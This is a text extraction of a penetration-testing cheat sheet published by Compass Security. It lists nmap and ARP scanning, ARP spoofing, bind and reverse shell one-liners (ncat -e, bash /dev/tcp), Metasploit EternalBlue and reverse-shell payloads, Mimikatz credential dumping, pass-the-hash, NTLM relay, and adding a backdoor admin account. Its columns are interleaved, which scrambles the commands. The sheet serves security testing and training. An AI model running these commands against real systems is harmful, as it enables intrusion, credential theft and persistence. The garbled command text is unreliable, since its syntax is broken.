Hacking Tools Cheat Sheet

Hacking Tools Cheat Sheet

Start TLS Server: Delete ARP cache: Scan for vulnerabilities (script category filter): Hacking Tools Cheat Sheet # ncat --ssl -l -p 1337 --ssl-cert # ip neigh flush all # nmap -n -Pn --script "vuln and safe" Compass Security, Version 1.1, January 2020 cert.pem --ssl-key key.pem Sniff traffic: 10.5.23.0/24 https://www.compass-security.com Connect to TLS service: # tcpdump [options] [filters] Performance Tuning (1 SYN packet ≈ 60 bytes # ncat --ssl 10.5.23.42 1337 Useful tcpdump options: → 20'000 packets/s ≈ 10 Mbps): Basic Linux Networking Tools Connect to TLS service using openssl: ▪ -i interface: Interface or any for all # nmap -n -Pn --min-rate 20000 10.5.23.0/24 Show IP configuration: # openssl s_client -connect ▪ -n: Disable name and port resolution # ip a l 10.5.23.42:1337 ▪ -A: Print in ASCII Useful nmap options: Change IP/MAC address: Show certificate details: ▪ -XX: Print in hex and ASCII ▪ -n: Disable name and port resolution # ip link set dev eth0 down # openssl s_client -connect ▪ -w file: Write output PCAP file ▪ -PR: ARP host discovery # macchanger -m 23:05:13:37:42:21 eth0 10.5.23.42:1337 | openssl x509 -text ▪ -r file: Read PCAP file ▪ -Pn: Disable host discovery # ip link set dev eth0 up Test TLS server certificate and ciphers: ▪ -sn: Disable port scan (host discovery only) Useful tcpdump filters: # sslyze --regular 10.5.23.42:443 ▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan Static IP address configuration: ▪ not arp: No ARP packets # ip addr add 10.5.23.42/24 dev eth0 ▪ --top-ports 50: Scan 50 top ports TCP to TLS proxy: ▪ port ftp or port 23: Only port 21 or 23 ▪ -iL file: Host input file DNS lookup: # socat TCP-LISTEN:2305,fork,reuseaddr ▪ host 10.5.23.31: Only from/to host ssl:example.com:443 ▪ -oA file: Write output files (3 types) # dig compass-security.com ▪ net 10.5.23.0/24: Only from/to hosts in ▪ -sC: Script scan (default scripts) Reverse DNS lookup: Online TLS tests: network ▪ : Specific scripts # dig -x 10.5.23.42 ▪ ssllabs.com, hardenize.com --script <file/category> Advanced sniffing using tshark or Wireshark. ▪ -sV: Version detection Information Gathering HTTP Tools Sniffing over SSH on a remote host: ▪ -6: IPv6 scan # ssh 10.5.23.42 tcpdump -w- port not The target can be specified using CIDR notation Find owner/contact of domain or IP address: Start Python webserver on port 2305: ssh | wireshark -k -i - # whois compass-security.com # python3 -m http.server 2305 (10.5.23.0/24) or range definitions (10.13- Search in network traffic: 37.5.1-23). Get nameservers and test for DNS zone transfer: Perform HTTP Request: # ngrep -i password # dig example.com ns # curl http://10.5.23.42:2305/?foo=bar Fast scan using masscan: Show HTTP GET requests: # dig example.com axfr @n1.example.com Useful curl options: # masscan -p80,8000-8100 --rate 20000 # urlsnarf 10.0.0.0/8 Get hostnames from CT logs: Search for ▪ -k: Accept untrusted certificates Show transmitted images: %.compass-security.com on https://crt.sh. ▪ -d "foo=bar": HTTP POST data Public internet scan databases: # driftnet ▪ shodan.io, censys.io Or using an nmap script: ▪ -H: "Foo: Bar": HTTP header # nmap -sn -Pn compass-security.com ▪ -I: Perform HEAD request Network Scanning Shells --script hostmap-crtsh ▪ -L: Follow redirects ARP Scan: ▪ -o foobar.html: Write output file Start bind shell (on victim): Combine various sources for subdomain enum: # nmap -n -sn -PR 10.5.23.0/24 # amass enum -src -brute -min-for- ▪ --proxy http://127.0.0.1:8080: Set proxy # ncat -l -p 2305 -e "/bin/bash -i" Reverse DNS lookup of IP range: recursive 2 -d compass-security.com Scan for common files/applications/configs: Connect to bind shell (on attacker): # nmap -sL 10.5.23.0/24 # nikto -host https://example.net # ncat 10.5.23.42 2305 TCP Tools Nmap host discovery (ARP, ICMP, SYN 443/tcp, Enumerate common directory-/filenames: Listen for reverse shell (on attacker): ACK 80/tcp): Listen on TCP port: # gobuster dir -k -u # ncat -l -p 23 # nmap -sn -n 10.5.23.0/24 # ncat -l -p 1337 https://example.net -w Start reverse shell (on victim): Connect to TCP port: /usr/share/wordlists/dirb/common.txt TCP scan (SYN scan = half-open scan): # ncat -e "/bin/bash -i" 10.5.23.5 23 # nmap -Pn -n -sS -p # ncat 10.5.23.42 1337 Start reverse shell with bash only (on victim): Sniffing 22,25,80,443,8080 10.5.23.0/24 # bash -i &>/dev/tcp/10.5.23.5/42 0>&1 TLS Tools ARP spoofing: List Nmap scripts: Upgrade to pseudo terminal: # arpspoof -t 10.5.23.42 10.5.23.1 # ls /usr/share/nmap/scripts Create self-signed certificate: # python -c 'import pty; # openssl req -x509 -newkey rsa:2048 Or a graphical tool: Scan for EternalBlue vulnerable hosts: pty.spawn("/bin/bash")' -keyout key.pem -out cert.pem -nodes # ettercap -G # nmap -n -Pn -p 443 --script smb- -subj "/CN=example.org/" vuln-ms17-010 10.5.23.0/24 Show ARP cache: # ip neigh Vulnerability DBs and Exploits Upgrade to Meterpreter (or press ^Z (Ctrl-Z)): bypass ExecutionPolicy and execute Invoke- Meterpreter via pass-the-hash: background AllChecks. Use the abuse functions. msf > set payload Exploit search (local copy of the Exploit-DB): Background session 1? [y/N] y windows/meterpreter/reverse_tcp Add a new local admin: # searchsploit apache > sessions # list sessions msf > set LHOST 10.5.23.42 # attacker C:\> net user backdoor P@ssw0rd23 Show exploit file path and copy it into clipboard: > sessions -u 1 # Upgrade msf > set LPORT 443 C:\> net localgroup Administrators # searchsploit -p 40142 > sessions 2 # interact with session 2 msf > set RHOST 10.5.23.21 # victim backdoor /add meterpreter > sysinfo # use it msf > set SMBPass 01[...]03:01[...]03 Online vulnerability and exploit databases: Scan for network shares: Upload / download files: msf > exploit ▪ cvedetails.com, exploit-db.com, # smbmap.py --host-file smbhosts.txt - meterpreter > upload pwn.exe meterpreter > shell packetstormsecurity.com u Administrator -p PasswordOrHash meterpreter > download c:\keepass.kdb C:\WINDOWS\system32> Cracking Execute a file: Windows Credentials Gathering NTLM Relay meterpreter > execute -i -f /your/bin Try SSH passwords from a wordlist: Start Mimikatz and create log file: Vulnerable if message_signing: disabled: # ncrack -p 22 --user root -P Port forwarding to localhost: C:\>mimikatz.exe # nmap -n -Pn -p 445 --script smb- ./passwords.txt 10.5.23.0/24 meterpreter > portfwd add -l 2323 -p # privilege::debug security-mode 10.5.23.0/24 3389 -r 10.5.23.23 # log C:\tmp\mimikatz.log Determine hash type: Disable SMB and HTTP in Responder.conf and Background Meterpreter session: # hashid 869d[...]bd88 Read lsass.exe process dump: start Responder: meterpreter > background Show example hash types for hashcat: # sekurlsa::minidump lsass.dmp # ./Responder.py -I eth0 Pivoting through existing Meterpreter session: # hashcat --example-hashes Dump lsass.exe in taskmgr or procdump. NTLM Relay to target and extract SAM file: > use post/multi/manage/autoroute Crack hashes (e.g. 5600 for NetNTLMv2 type): # ./ntlmrelayx.py -smb2support -t > set session 2 # meterpreter session Show passwords/hashes of logged in users: smb://10.5.23.42 # hashcat -m 5600 -a 0 hash.txt > run # sekurlsa::logonpasswords /path/to/wordlists/* > route Backup SYSTEM & SAM hive: NTLM Relay using socks proxy: # ./ntlmrelayx.py -tf targets.txt Crack hashes using John the Ripper: SOCKS via Meterpreter (requires autoroute): C:\>reg save HKLM\SYSTEM system.hiv -smb2support -socks # john hashes.txt > use auxiliary/server/socks4a C:\>reg save HKLM\SAM sam.hiv > set SRVPORT 8080 Extract hashes using Mimikatz: Configure ProxyChains: Metasploit Framework > run # lsadump::sam /system:system.hiv # vi /etc/proxychains.conf [...] Start Metasploit: Configure ProxyChains: /sam:sam.hiv socks4 127.0.0.1 1080 # msfconsole # vi /etc/proxychains.conf Search exploit: [...] Pass-the-Hash Access files via SOCKS proxy: > search eternalblue socks4 127.0.0.1 1080 Shell via pass-the-hash (Impacket Tools): # proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Connect through SOCKS proxy: # ./psexec.py -hashes Use exploit: Administrator%invalidPwd msf > use exploit/windows/smb/ms17_… # proxychains ncat 172.23.5.42 1337 :011AD41795657A8ED80AB3FF6F078D03 domain/[email protected] Configure exploit: Active Directory Linux Privilege Escalation Over a subnet and extract SAM file: msf exploit(…) > show options Use SharpHound to gather information and im- msf exploit(…) > set TARGET 10.5.23.42 Enumerate local information (-t for more tests): # crackmapexec -u Administrator -H port into Bloodhound to analyze. # curl -o /tmp/linenum :011AD41795657A8ED80AB3FF6F078D03 Run exploit: 10.5.23.0/24 --sam Download PingCastle from pingcastle.com and msf exploit(…) > exploit https://raw.githubusercontent.com/rebo otuser/LinEnum/master/LinEnum.sh Browse shares via pass-the-hash: generate Report. Generate reverse shell (WAR): # bash /tmp/linenum -r /tmp/report # ./smbclient.py # msfvenom -p Other hardening checks can be done using lynis domain/[email protected] -hashes More Online References java/jsp_shell_reverse_tcp LHOST=<your :011AD41795657A8ED80AB3FF6F078D03 ▪ GitHub "swisskyrepo/PayloadsAllTheThings" ip address> LPORT=443 -f war > sh.war or LinPEAS. ▪ GitHub "danielmiessler/SecLists Use sudo/SUID/capabilities/etc. exploits from RDP via pass-the-hash: Reverse shell listener: # xfreerdp /u:user /d:domain /pth: ▪ GitHub "enaqx/awesome-pentest" gtfobins.github.io. > use exploit/multi/handler 011AD41795657A8ED80AB3FF6F078D03 > set payload /v:10.5.23.42 linux/x64/shell_reverse_tcp Windows Privilege Escalation > set LHOST 10.5.23.42 # attacker Copy PowerUp.ps1 from GitHub "Pow- > set LPORT 443 erShellMafia/PowerSploit" into PowerShell to > exploit .

View Full Text

Details

  • File Type
    pdf
  • Upload Time
    -
  • Content Languages
    English
  • Upload User
    Anonymous/Not logged-in
  • File Pages
    2 Page
  • File Size
    -

Download

Channel Download Status
Express Download Enable

Copyright

We respect the copyrights and intellectual property rights of all users. All uploaded documents are either original works of the uploader or authorized works of the rightful owners.

  • Not to be reproduced or distributed without explicit permission.
  • Not used for commercial purposes outside of approved use cases.
  • Not used to infringe on the rights of the original creators.
  • If you believe any content infringes your copyright, please contact us immediately.

Support

For help with questions, suggestions, or problems, please contact us